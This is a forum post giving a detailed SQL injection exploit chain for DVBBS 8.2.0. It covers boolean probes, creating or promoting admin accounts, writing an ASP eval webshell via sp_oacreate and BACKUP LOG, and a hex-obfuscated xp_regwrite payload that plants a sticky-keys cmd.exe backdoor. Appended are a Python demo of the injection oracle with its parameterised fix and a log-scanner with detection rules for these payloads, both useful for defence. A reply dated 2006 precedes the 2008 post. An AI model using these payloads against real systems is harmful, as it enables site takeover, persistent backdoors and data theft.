Server maintenance, managed server operation, security configuration, vulnerability scanning, intrusion detection services

dirtysea posted on 2008-11-5 04:54:04

DVBBS 8.2.0 vulnerability exploitation + getting a shell, explained in detail

<admin user>' and '1'='1     Username or password is incorrect.
<admin user>' ' and '1'='2    This forum has no such username.
If the two responses differ, the vulnerability exists.

Next, determine the database type:
;and (select count(*) from sysobjects)>0
;and (select count(*) from msysobjects)>0

Check whether admin exists:
admin' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1
admin' and 1=(select count(*) from dv_admin where left(password,1)='a') and '1'='1

Check privileges:
' and (select is_srvrolemember('sysadmin'))>0--
' and (select IS_MEMBER('db_owner'))>0--

af0378da05f63f89=abcd1234

Method 1: register a user

Change the password:
<registered user (tester)>';update dv_user set password='af0378da05f63f89' where username='tester'--

Add it to the admin group:
<registered user (tester)>';update dv_user set usergroupid=1 where username='tester'--

Method 2: create a user directly

Create a new user and add it to the admin group:
<existing user (admin)>';insert into dv_user (username,userpassword,usergroupid) values('tester','af0378da05f63f89','1')--
<existing user (admin)>';insert into dv_admin (username,password,flag,adduser) values ('tester','af0378da05f63f89','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','tester')--

Clean up the users:
delete from dv_admin where username='tester'
delete from dv_user where username='tester'

Approaches to getting a webshell:

First approach:
DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into web (gyfd) values(@result);
update dv_user set useremail =@result where username='bugtest1';
First get your own email address changed to the website directory, then:
declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, '<directory obtained above + trojan path>', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<%eval request("#")%>';--

Second approach:
Image hijack: the 5-Shift backdoor
declare @s varchar(4000) set @s=cast(0x657865632078705F72656777726974652027484B45595F4C4F43414C5F4D414348494E45272C27534F4654574152455C4D6963726F736F66745C57696E646F7773204E545C43757272656E7456657273696F6E5C496D6167652046696C6520457865637574696F6E204F7074696F6E735C73657468632E657865272C276465627567676572272C277265675F737A272C27633A5C77696E646F77735C73797374656D33325C636D642E65786527DA as varchar(4000));exec(@s);

Third approach:
Find the website path, then BACKUP LOG to a webshell:
alter database XXX set RECOVERY FULL--
create table cmd (a image)--
backup log XXX to disk = 'c:\cmd' with init--
insert into cmd (a) values ('<%%25eval(request("a")):response.end%%25>')--
backup log XXX to disk = 'e:\web\test.asp'--
drop table cmd--
alter database XXX set RECOVERY SIMPLE--
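The boolean oracle at the top of the post (two tautology probes that produce different error messages) rebuilt as an added example; this is not code from the post or from DVBBS. It uses an in-memory SQLite table whose name and columns mirror the post's dv_admin, with one constructed row, and places the string-concatenation lookup beside its parameterised replacement so the reader can see the oracle appear and disappear.

```python
# Added example, not code from the DVBBS project or from the post above.
# It rebuilds the boolean oracle the post describes against a throwaway
# SQLite table (the table and column names mirror the post's dv_admin;
# the row is constructed), then shows the parameterised form that closes it.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the forum's admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dv_admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO dv_admin VALUES ('admin', 'af0378da05f63f89')")
    conn.commit()
    return conn


def user_exists_vulnerable(conn: sqlite3.Connection, username: str) -> bool:
    """The classic-ASP pattern the post abuses: the submitted name is
    concatenated into the WHERE clause and reaches the SQL parser."""
    sql = "SELECT count(*) FROM dv_admin WHERE username='" + username + "'"
    return conn.execute(sql).fetchone()[0] > 0


def user_exists_fixed(conn: sqlite3.Connection, username: str) -> bool:
    """Parameterised form: the name is bound as data, so a quote inside it
    is just a character and cannot open a new predicate."""
    sql = "SELECT count(*) FROM dv_admin WHERE username=?"
    return conn.execute(sql, (username,)).fetchone()[0] > 0


TRUE_PROBE = "admin' and '1'='1"    # the post's first request
FALSE_PROBE = "admin' and '1'='2"   # the post's second request


def oracle_present(lookup, conn: sqlite3.Connection) -> bool:
    """The post's own test, run as a function: send a true and a false
    tautology and compare. A different answer means the input was parsed
    as SQL, i.e. the lookup is injectable."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks:", oracle_present(user_exists_vulnerable, db))  # True
    print("parameterised lookup leaks:", oracle_present(user_exists_fixed, db))   # False
```

The two lookups return the same rows for any legitimate username; the only thing the parameterised version changes is that the probe strings are compared as literal usernames (which do not exist), so both probes answer "no such user" and the oracle the post relies on is gone.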
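From the detection side, the statement families the post walks through (tautology probe, sysobjects fingerprint, privilege changes on dv_user/dv_admin, xp_regread, sp_oacreate, BACKUP LOG to disk) are distinctive enough to flag in web-server logs. The scanner below is an added example, not from the post or DVBBS; the log layout (date time client-ip method uri-stem uri-query status) and every request string in SAMPLE_LOG are constructed for the demonstration.

```python
# Added example, not from the post or the DVBBS project: a signature scan for
# the statement families quoted above, run over constructed IIS-style log
# lines. The log layout (date time client-ip method uri-stem uri-query status)
# and every request string are made up for the demonstration.
import re
from urllib.parse import unquote_plus

# One rule per payload family from the post; all matching is done on the
# URL-decoded query string so %27 / + encoding does not hide the pattern.
RULES = [
    ("boolean-probe",    re.compile(r"'\s*and\s*'1'\s*=\s*'[12]", re.I)),
    ("db-fingerprint",   re.compile(r"select\s+count\(\*\)\s+from\s+m?sysobjects", re.I)),
    ("role-check",       re.compile(r"is_srvrolemember\s*\(|is_member\s*\(", re.I)),
    ("account-tamper",   re.compile(r"(update|insert\s+into)\s+dv_(user|admin)\b", re.I)),
    ("registry-xp",      re.compile(r"xp_reg(read|write)", re.I)),
    ("ole-automation",   re.compile(r"sp_oa(create|method)", re.I)),
    ("backup-log-write", re.compile(r"backup\s+log\s+\S+\s+to\s+disk", re.I)),
]


def decode_request(line: str) -> str:
    """Return the decoded 'stem?query' of one log line, or '' if malformed."""
    parts = line.split()
    if len(parts) < 7:
        return ""
    return unquote_plus(parts[4] + "?" + parts[5])


def scan_line(line: str) -> list:
    """Names of every rule that fires on this line."""
    decoded = decode_request(line)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(lines) -> dict:
    """Map each fired rule to the list of client IPs that triggered it."""
    hits = {}
    for line in lines:
        for name in scan_line(line):
            hits.setdefault(name, []).append(line.split()[2])
    return hits


def flagged_clients(lines) -> list:
    """Sorted, de-duplicated client IPs with at least one hit."""
    return sorted({ip for ips in scan_log(lines).values() for ip in ips})


# Constructed sample log; the first four requests mirror the post's stages
# (oracle probe, DB fingerprint, privilege change, log-backup file write),
# the last one is ordinary traffic.
SAMPLE_LOG = [
    "2008-11-05 04:54:04 10.0.0.5 GET /login.asp username=admin%27+and+%271%27%3D%271&password=x 200",
    "2008-11-05 04:54:10 10.0.0.5 GET /login.asp username=x%27%3Band+(select+count(*)+from+sysobjects)%3E0-- 200",
    "2008-11-05 04:55:01 10.0.0.5 GET /login.asp username=tester%27%3Bupdate+dv_user+set+usergroupid%3D1+where+username%3D%27tester%27-- 200",
    "2008-11-05 04:56:30 10.0.0.5 GET /login.asp username=a%27%3Bbackup+log+dvbbs+to+disk+%3D+%27e%3A%5Cweb%5Ctest.asp%27-- 500",
    "2008-11-05 05:00:00 10.0.0.9 GET /index.asp boardid=12 200",
]

if __name__ == "__main__":
    for rule, ips in scan_log(SAMPLE_LOG).items():
        print(f"{rule}: {', '.join(ips)}")
    print("flagged:", flagged_clients(SAMPLE_LOG))  # ['10.0.0.5']
```

The rules are deliberately narrow (they key on identifiers such as dv_user, sysobjects and the extended stored procedures the post uses) so that a hit is worth an analyst's time; a single client tripping several families in sequence, as in the sample, is the pattern that matters more than any one line.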

新疆人胡胡 posted on 2006-6-15 21:24:13

re: DVBBS 8.2.0 vulnerability exploitation + getting a shell, explained in detail

...........................Of course it is. Hahahaha,